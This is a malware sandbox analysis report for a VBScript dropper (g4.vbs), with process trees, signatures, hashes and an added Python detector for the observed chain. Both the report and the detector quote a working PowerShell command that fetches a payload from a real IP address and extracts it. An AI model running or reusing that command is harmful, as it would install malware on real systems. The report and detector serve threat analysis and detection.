Resubmissions

12/03/2024, 14:32

240312-rwjvaada89 10

12/03/2024, 14:27

240312-rsqhnach88 10

Analysis

  • max time kernel
    350s
  • max time network
    705s
  • platform
    windows7_x64
  • resource
    win7-20240220-en
  • resource tags
    arch:x64, arch:x86, image:win7-20240220-en, locale:en-us, os:windows7-x64, system
  • submitted
    12/03/2024, 14:32

General

  • Target

    g4.vbs

  • Size

    731B

  • MD5

    f82736dcca9ccf1e8460707f48f51478

  • SHA1

    2210fe31ae5e82413301a8e91bce03cf1eb14246

  • SHA256

    e2228f06454d5c8033bb22ad4a81bbc3997e318bf34372a57232b51e8360f4d8

  • SHA512

    67c5be560f30f2299f91288215924fb96db32a73a2beab988f7cb38a721984ee0f8f986f43b2780c3574ad81ffbeb98b3d4112e9982f3e4ec2e80fde27014c5f

Score
10/10

Malware Config

Extracted

  • Language
    ps1
  • Deobfuscated
  • URLs
    exe.dropper
    http://104.243.44.136:777/moh.jpg

Signatures

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Modifies Internet Explorer settings 1 TTPs 26 IoCs
  • Opens file in notepad (likely ransom note) 4 IoCs
  • Suspicious behavior: EnumeratesProcesses 9 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 35 IoCs
  • Suspicious use of SendNotifyMessage 32 IoCs
  • Suspicious use of SetWindowsHookEx 4 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\g4.vbs"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2860
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Start-BitsTransfer -Source 'http://104.243.44.136:777/moh.jpg' -Destination 'C:\Users\Public\ben.zip'; Expand-Archive -Path 'C:\Users\Public\ben.zip' -DestinationPath 'C:\Users\Public\' -Force
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2920
  • C:\Windows\explorer.exe
    "C:\Windows\explorer.exe"
    1⤵
    PID:2512
  • C:\Program Files\Internet Explorer\iexplore.exe
    "C:\Program Files\Internet Explorer\iexplore.exe" http://users/
    1⤵
    • Modifies Internet Explorer settings
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1772
    • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
      "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1772 CREDAT:275457 /prefetch:2
      2⤵
      • Modifies Internet Explorer settings
      • Suspicious use of SetWindowsHookEx
      PID:2452
  • C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe"
    1⤵
    • Enumerates system info in registry
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    PID:552
    • C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef4dd9758,0x7fef4dd9768,0x7fef4dd9778
      2⤵
      PID:1764
    • C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1176 --field-trial-handle=1200,i,5660191629799940190,1500305782023709507,131072 /prefetch:2
      2⤵
      PID:1672
    • C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1512 --field-trial-handle=1200,i,5660191629799940190,1500305782023709507,131072 /prefetch:8
      2⤵
      PID:812
    • C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1600 --field-trial-handle=1200,i,5660191629799940190,1500305782023709507,131072 /prefetch:8
      2⤵
      PID:1540
    • C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2292 --field-trial-handle=1200,i,5660191629799940190,1500305782023709507,131072 /prefetch:1
      2⤵
      PID:1460
    • C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2300 --field-trial-handle=1200,i,5660191629799940190,1500305782023709507,131072 /prefetch:1
      2⤵
      PID:1924
    • C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=1284 --field-trial-handle=1200,i,5660191629799940190,1500305782023709507,131072 /prefetch:2
      2⤵
      PID:2756
    • C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=1448 --field-trial-handle=1200,i,5660191629799940190,1500305782023709507,131072 /prefetch:1
      2⤵
      PID:2408
    • C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3700 --field-trial-handle=1200,i,5660191629799940190,1500305782023709507,131072 /prefetch:8
      2⤵
      PID:1912
    • C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --mojo-platform-channel-handle=3720 --field-trial-handle=1200,i,5660191629799940190,1500305782023709507,131072 /prefetch:1
      2⤵
      PID:816
    • C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --mojo-platform-channel-handle=3184 --field-trial-handle=1200,i,5660191629799940190,1500305782023709507,131072 /prefetch:1
      2⤵
      PID:2772
    • C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --mojo-platform-channel-handle=3752 --field-trial-handle=1200,i,5660191629799940190,1500305782023709507,131072 /prefetch:1
      2⤵
      PID:2876
    • C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --mojo-platform-channel-handle=3888 --field-trial-handle=1200,i,5660191629799940190,1500305782023709507,131072 /prefetch:1
      2⤵
      PID:2844
    • C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --mojo-platform-channel-handle=3396 --field-trial-handle=1200,i,5660191629799940190,1500305782023709507,131072 /prefetch:1
      2⤵
      PID:2312
    • C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1880 --field-trial-handle=1200,i,5660191629799940190,1500305782023709507,131072 /prefetch:8
      2⤵
      PID:1268
    • C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --mojo-platform-channel-handle=2508 --field-trial-handle=1200,i,5660191629799940190,1500305782023709507,131072 /prefetch:1
      2⤵
      PID:2600
  • C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
    "C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
    1⤵
    PID:2204
  • C:\WINDOWS\system32\WindowsPowerShell\v1.0\powershell.exe
    "C:\WINDOWS\system32\WindowsPowerShell\v1.0\powershell.exe"
    1⤵
    • Suspicious behavior: EnumeratesProcesses
    PID:300
  • C:\Windows\system32\NOTEPAD.EXE
    "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\a.txt
    1⤵
    • Opens file in notepad (likely ransom note)
    PID:1372
  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "-file" "C:\Users\Admin\Desktop\a.ps1"
    1⤵
    • Suspicious behavior: EnumeratesProcesses
    PID:2224
  • C:\WINDOWS\system32\WindowsPowerShell\v1.0\powershell.exe
    "C:\WINDOWS\system32\WindowsPowerShell\v1.0\powershell.exe"
    1⤵
    • Suspicious behavior: EnumeratesProcesses
    PID:320
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" C:\Users\Admin\Desktop\a.ps1
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      PID:2636
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass
      2⤵
      PID:912
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" C:\Users\Admin\Desktop\a.ps1
        3⤵
        PID:2512
  • C:\Windows\System32\notepad.exe
    "C:\Windows\System32\notepad.exe" "C:\Users\Admin\Desktop\a.ps1"
    1⤵
    • Opens file in notepad (likely ransom note)
    PID:2672
  • C:\Windows\system32\NOTEPAD.EXE
    "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\aaa.txt
    1⤵
    • Opens file in notepad (likely ransom note)
    PID:2852
  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\aaa.vbs"
    1⤵
    PID:412
  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\a.vbs"
    1⤵
    PID:2412
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Start-BitsTransfer -Source 'http://104.243.44.136:777/moh.jpg' -Destination 'C:\Users\Public\ben.zip'; Expand-Archive -Path 'C:\Users\Public\ben.zip' -DestinationPath 'C:\Users\Public\' -Force
      2⤵
      PID:2192
  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\a.vbs"
    1⤵
    PID:2260
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Start-BitsTransfer -Source 'http://104.243.44.136:777/moh.jpg' -Destination 'C:\Users\Public\ben.zip'; Expand-Archive -Path 'C:\Users\Public\ben.zip' -DestinationPath 'C:\Users\Public\' -Force
      2⤵
      PID:1424
  • C:\Windows\explorer.exe
    "C:\Windows\explorer.exe"
    1⤵
    PID:2104
  • C:\Windows\system32\AUDIODG.EXE
    C:\Windows\system32\AUDIODG.EXE 0x4fc
    1⤵
    PID:2692
  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\a.vbs"
    1⤵
    PID:1932
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Start-BitsTransfer -Source 'http://104.243.44.136:777/moh.jpg' -Destination 'C:\Users\Public\ben.zip'; Expand-Archive -Path 'C:\Users\Public\ben.zip' -DestinationPath 'C:\Users\Public\' -Force
      2⤵
      PID:2392
  • C:\Windows\System32\CScript.exe
    "C:\Windows\System32\CScript.exe" "C:\Users\Admin\Desktop\a.vbs"
    1⤵
    PID:1976
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Start-BitsTransfer -Source 'http://104.243.44.136:777/moh.jpg' -Destination 'C:\Users\Public\ben.zip'; Expand-Archive -Path 'C:\Users\Public\ben.zip' -DestinationPath 'C:\Users\Public\' -Force
      2⤵
      PID:1672
  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\a.vbs"
    1⤵
    PID:2192
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Start-BitsTransfer -Source 'http://104.243.44.136:777/moh.jpg' -Destination 'C:\Users\Public\ben.zip'; Expand-Archive -Path 'C:\Users\Public\ben.zip' -DestinationPath 'C:\Users\Public\' -Force
      2⤵
      PID:2884
  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\a.vbs"
    1⤵
    PID:1808
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Start-BitsTransfer -Source 'http://104.243.44.136:777/moh.jpg' -Destination 'C:\Users\Public\ben.zip'; Expand-Archive -Path 'C:\Users\Public\ben.zip' -DestinationPath 'C:\Users\Public\' -Force
      2⤵
      PID:2700
  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\a.vbs"
    1⤵
    PID:2020
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Start-BitsTransfer -Source 'http://104.243.44.136:777/moh.jpg' -Destination 'C:\Users\Public\ben.zip'; Expand-Archive -Path 'C:\Users\Public\ben.zip' -DestinationPath 'C:\Users\Public\' -Force
      2⤵
      PID:2620
  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\aaa.vbs"
    1⤵
    PID:1620
  • C:\Windows\System32\Notepad.exe
    "C:\Windows\System32\Notepad.exe" C:\Users\Admin\Desktop\a.vbs
    1⤵
    • Opens file in notepad (likely ransom note)
    PID:2900
  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\a.vbs"
    1⤵
    PID:1752
  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\a.vbs"
    1⤵
    PID:1872
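The chain worth alerting on in the tree above is WScript.exe (running g4.vbs, later a.vbs and, once, CScript.exe) spawning powershell.exe, which fetches http://104.243.44.136:777/moh.jpg over BITS, writes it as C:\Users\Public\ben.zip and immediately runs Expand-Archive on it: the .jpg name is an extension masquerade for a ZIP, served from a raw IP on a non-standard port. The Python below is an added example, not part of the sandbox output, that scores process-creation events for that pattern and checks a downloaded file's leading bytes against the extension its name claims. The events and byte strings are constructed to mirror the report; field names follow Sysmon Event ID 1, and the benign event and its URL are hypothetical.

```python
import re
from dataclasses import dataclass
from urllib.parse import urlparse

# Added example, not sandbox output: score process-creation events for the
# script-host -> powershell -> Start-BitsTransfer -> Expand-Archive chain
# shown in the report's process tree. Field names follow Sysmon Event ID 1;
# every event and byte string below is constructed for the example.

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
IMAGE_EXTS = (".jpg", ".jpeg", ".png", ".gif", ".bmp")
PAYLOAD_EXTS = (".zip", ".exe", ".dll", ".ps1", ".vbs")
ZIP_MAGIC = b"PK\x03\x04"  # local file header signature of a ZIP archive


@dataclass
class ProcEvent:
    pid: int
    parent_image: str   # full path of the parent process
    image: str          # full path of the created process
    command_line: str


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def bits_transfers(cmd: str) -> list:
    """(source URL, destination path) pairs from Start-BitsTransfer calls."""
    pat = re.compile(
        r"Start-BitsTransfer\s+-Source\s+'([^']+)'\s+-Destination\s+'([^']+)'", re.I)
    return pat.findall(cmd)


def analyze(ev: ProcEvent) -> list:
    """Reasons this event resembles the reported dropper; [] means no match."""
    reasons = []
    child, parent = _basename(ev.image), _basename(ev.parent_image)
    if child == "powershell.exe" and parent in SCRIPT_HOSTS:
        reasons.append(f"{parent} spawned powershell.exe")
    transfers = bits_transfers(ev.command_line)
    for src, dst in transfers:
        reasons.append("Start-BitsTransfer used as a downloader")
        u = urlparse(src)
        host = u.hostname or ""
        if u.scheme == "http" and u.port not in (None, 80):
            reasons.append(f"plain HTTP on non-standard port {u.port}")
        if re.fullmatch(r"\d{1,3}(\.\d{1,3}){3}", host):
            reasons.append(f"raw IP {host} instead of a hostname")
        if u.path.lower().endswith(IMAGE_EXTS) and dst.lower().endswith(PAYLOAD_EXTS):
            reasons.append(f"image-named URL {u.path} written as {_basename(dst)}")
    if transfers and re.search(r"\bExpand-Archive\b", ev.command_line, re.I):
        reasons.append("download chained into Expand-Archive in one command line")
    return reasons


def is_masqueraded_archive(claimed_name: str, head: bytes) -> bool:
    """True when a file named like an image actually begins with a ZIP header."""
    return claimed_name.lower().endswith(IMAGE_EXTS) and head.startswith(ZIP_MAGIC)


# Constructed events modelled on the report's tree (PID 2920 under WScript.exe).
REPORTED = ProcEvent(
    pid=2920,
    parent_image=r"C:\Windows\System32\WScript.exe",
    image=r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
    command_line=(r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" '
                  "Start-BitsTransfer -Source 'http://104.243.44.136:777/moh.jpg' "
                  r"-Destination 'C:\Users\Public\ben.zip'; "
                  r"Expand-Archive -Path 'C:\Users\Public\ben.zip' "
                  r"-DestinationPath 'C:\Users\Public\' -Force"),
)
# Hypothetical benign BITS download (host and path invented for contrast).
BENIGN = ProcEvent(
    pid=4100,
    parent_image=r"C:\Windows\explorer.exe",
    image=r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
    command_line=(r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" '
                  "Start-BitsTransfer -Source 'https://updates.example.com/tool.zip' "
                  r"-Destination 'C:\Temp\tool.zip'"),
)

if __name__ == "__main__":
    for ev in (REPORTED, BENIGN):
        print(ev.pid, analyze(ev))
    print(is_masqueraded_archive("moh.jpg", b"PK\x03\x04\x14\x00"))
```

Each reason is a separate string so an alerting rule can weight them: a single Start-BitsTransfer is common in update scripts, while the combination of a script-host parent, an image extension written to a .zip and an in-line Expand-Archive is what this report shows and what a rule should require. The magic-byte check is the file-side counterpart: the sandbox labels moh.jpg as exe.dropper, and a ZIP local file header under an image name is the cheapest way to confirm that on disk.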

Network

MITRE ATT&CK Enterprise v15

Downloads

  • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\GCM Store\Encryption\000006.dbtmp
    Filesize
    16B
    MD5
    aefd77f47fb84fae5ea194496b44c67a
    SHA1
    dcfbb6a5b8d05662c4858664f81693bb7f803b82
    SHA256
    4166bf17b2da789b0d0cc5c74203041d98005f5d4ef88c27e8281e00148cd611
    SHA512
    b733d502138821948267a8b27401d7c0751e590e1298fda1428e663ccd02f55d0d2446ff4bc265bdcdc61f952d13c01524a5341bc86afc3c2cde1d8589b2e1c3
  • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\GPUCache\data_1
    Filesize
    264KB
    MD5
    f50f89a0a91564d0b8a211f8921aa7de
    SHA1
    112403a17dd69d5b9018b8cede023cb3b54eab7d
    SHA256
    b1e963d702392fb7224786e7d56d43973e9b9efd1b89c17814d7c558ffc0cdec
    SHA512
    bf8cda48cf1ec4e73f0dd1d4fa5562af1836120214edb74957430cd3e4a2783e801fa3f4ed2afb375257caeed4abe958265237d6e0aacf35a9ede7a2e8898d58
  • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State
    Filesize
    986B
    MD5
    0f4f741a30afcd13b686313d31ceaac3
    SHA1
    eb341e2203992dbb28d7f3deb4a444eb042e70c1
    SHA256
    42702e2d60b5d4319ff6fab128cb6585739e0de7080dd6f8ffe7502ef33d44da
    SHA512
    c9d06a1c933cf1152e1c08f58c9894b31d1d42726177b8b0cb63ba82d771a997f4f165d42c0b1367085ce422f842b77854d79dfa577761db9aefd4fe5de89583
  • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State
    Filesize
    1KB
    MD5
    901e0d6f7201a7be15fb48fd447fc052
    SHA1
    37142ec6982ed0d4a1785e3a6eb508c86d802a65
    SHA256
    f202496fa677af7806d28ca2922f268252dee7d4960b490cabe75ad0c0cd30a6
    SHA512
    1e304f8de325c960f9c6c7642703fc0188ac5c91e48022e8e79d33a6e0dfcfefc86cd5fd73fd79daae647d1644160c1e93255cea10d83603227f41ccd7d0dc1b
  • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
    Filesize
    5KB
    MD5
    f3886cb2abbd410384d2e247c1a19520
    SHA1
    90f9e2b731fa513c1e86b638460df7d718ad0b07
    SHA256
    50dbdc0db6f0d6fdc0e792c2b2fcfef681c2d3c9f9c5f9ffe2e6a23dca06378b
    SHA512
    95bfaf449af0231d3dc60e7dcc5ef6e5f265db3ac29890533bdc592d2feff493796b7d058a477fbe3042362d0cc382c1e02bd77af51b6036137fd4f8b3fe5a54
  • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
    Filesize
    6KB
    MD5
    cadd7e6cf4e00a0cb1eed886fabeea2d
    SHA1
    85253620e109ba0d4e8aa58e37e9fa23ee750ae5
    SHA256
    8a540158f7b0f8c5c459350aaeaca020a97d8339e87b87aa2295c1ddf8878ed7
    SHA512
    59adbac128efb40f9164fbee4f719cb73502bffacb86dd4e42cebe29704f05f7468bf7be99aa0453589695a22146106fb815e2df1c0c0bec6fef91fac9d81868
  • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
    Filesize
    5KB
    MD5
    b233c62080702539447e5a72cdede799
    SHA1
    c2ff017b4be967a0646420e2a46a327779a2f1c9
    SHA256

                                                                                    e549acf1a8b5e2d31a26c3694302a5b0c28f0cf51b3dae9960613ea0655ece41

                                                                                    SHA512

                                                                                    9471a6be1204970ed0968f72a2f7537a4c5c2284c6c87d1b149fe5b4178b581fc551a8c12839aace012336c65814c65f69dabe2e871262b35a5a8557bf17db5e

                                                                                  • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                                                                    Filesize

                                                                                    5KB

                                                                                    MD5

                                                                                    14cc8305ff7b6186efbae3b462fb60df

                                                                                    SHA1

                                                                                    1c2ace083e6a7a86956e6f890524c065b572878b

                                                                                    SHA256

                                                                                    734816f6f9791578d22c82213884a3cf8fa0b7ab83ee85fad9c5e6798d4bbe9e

                                                                                    SHA512

                                                                                    00e0521d2188a69b1829d43db7b4f55898a1b649295d0c9fb98d7be088e8585ec6af7feb2e1645edd349380373973a94ffa77a6b6a4f2205d13760a3a8789c5f

                                                                                  • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                                                                    Filesize

                                                                                    6KB

                                                                                    MD5

                                                                                    fa896589dc101569218d9554ad8cc547

                                                                                    SHA1

                                                                                    e4f98abc82cfb45b9deff5430f5bef716b2302cc

                                                                                    SHA256

                                                                                    a189c451f257e9c98f98a5a0bccb0f7c0877287ce59ef240341eac9480337db0

                                                                                    SHA512

                                                                                    681aaec310163a19cbbad82a6ce4133ffad1e2ec1ce400e5c9cb8ee65341174b5d0f4965f9321c2f9218374d3acd87349cb2e750449b2bc56b529d53476999cf

                                                                                  • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\000007.dbtmp

                                                                                    Filesize

                                                                                    16B

                                                                                    MD5

                                                                                    18e723571b00fb1694a3bad6c78e4054

                                                                                    SHA1

                                                                                    afcc0ef32d46fe59e0483f9a3c891d3034d12f32

                                                                                    SHA256

                                                                                    8af72f43857550b01eab1019335772b367a17a9884a7a759fdf4fe6f272b90aa

                                                                                    SHA512

                                                                                    43bb0af7d3984012d2d67ca6b71f0201e5b948e6fe26a899641c4c6f066c59906d468ddf7f1df5ea5fa33c2bc5ea8219c0f2c82e0a5c365ad7581b898a8859e2

                                                                                  • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\ef61fcc9-be5e-439b-a380-392b8ddc9ac7.tmp

                                                                                    Filesize

                                                                                    6KB

                                                                                    MD5

                                                                                    05705d148f14867cd4640a04eb817514

                                                                                    SHA1

                                                                                    adbf4fe123a665079de80164e90a87e3d70682af

                                                                                    SHA256

                                                                                    a1da84bf5b90d067dbe112810afa07a87d803398950b937c03816f1d1266198d

                                                                                    SHA512

                                                                                    89d9ea32df6661e912429110cb4d748195ec31a42913f23d8337df5d315f610558606ed7c14f934fa88b395f2376328514f93d6157cfbf334f9416920b133606

                                                                                  • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

                                                                                    Filesize

                                                                                    259KB

                                                                                    MD5

                                                                                    07d6a990d48d06a61fd3e7e83c1c1d1c

                                                                                    SHA1

                                                                                    da2e6cdc9a70a5da52655f3cb2b9f06071c07d5c

                                                                                    SHA256

                                                                                    7d06579813d4309157456e76d8b5cefc7efa4ed45bdc00e932323f4f361c4253

                                                                                    SHA512

                                                                                    1cd0eb1b9baa62208ad0e7c1ec34735e42dd9bc23c14ff72ba66795b6570eb3b706b609d27d144a628a37b2b7d9e67fcb222fd26d63a4dd537afafc573dadb4f

                                                                                  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

                                                                                    Filesize

                                                                                    7KB

                                                                                    MD5

                                                                                    d5ab74ae398f2d9b648d5fe5c4779a91

                                                                                    SHA1

                                                                                    617ae2d562c55ab47608003f1625c7e06a3915a2

                                                                                    SHA256

                                                                                    af4f562ecaf11c4f71ac62fa6ca1cca2face95aaf247820b70ddd01e2d01284b

                                                                                    SHA512

                                                                                    b14b252d32a557c82b94020c87722e3cbc75afc688bcb3c492c9bc2a327da7906ef04efb05887f92e18569c825755ab8c862026aacc789e934dbf54c7cbb6dff

                                                                                  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

                                                                                    Filesize

                                                                                    6KB

                                                                                    MD5

                                                                                    7559f17b255a8b1932e72a81a240096d

                                                                                    SHA1

                                                                                    386f4a21f8c8171e7c875ef809250be6633757cf

                                                                                    SHA256

                                                                                    519310fed8e699cf88dbef66e8aabeefda883555c49f50e58bd5a86bfb945eca

                                                                                    SHA512

                                                                                    8771d4599c8ac2ec316bb8e6799ea86e846a57ce4f49609b9ade73e264cbe4896d73cbd977c0195bb7e5702ef720da9cfae01b912d3aadb49a8632f88f0e888a

                                                                                  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\PRMODDT9PNEWFNRU6KTK.temp

                                                                                    Filesize

                                                                                    7KB

                                                                                    MD5

                                                                                    c35051a64ae0888a1ecd112759fc4fa4

                                                                                    SHA1

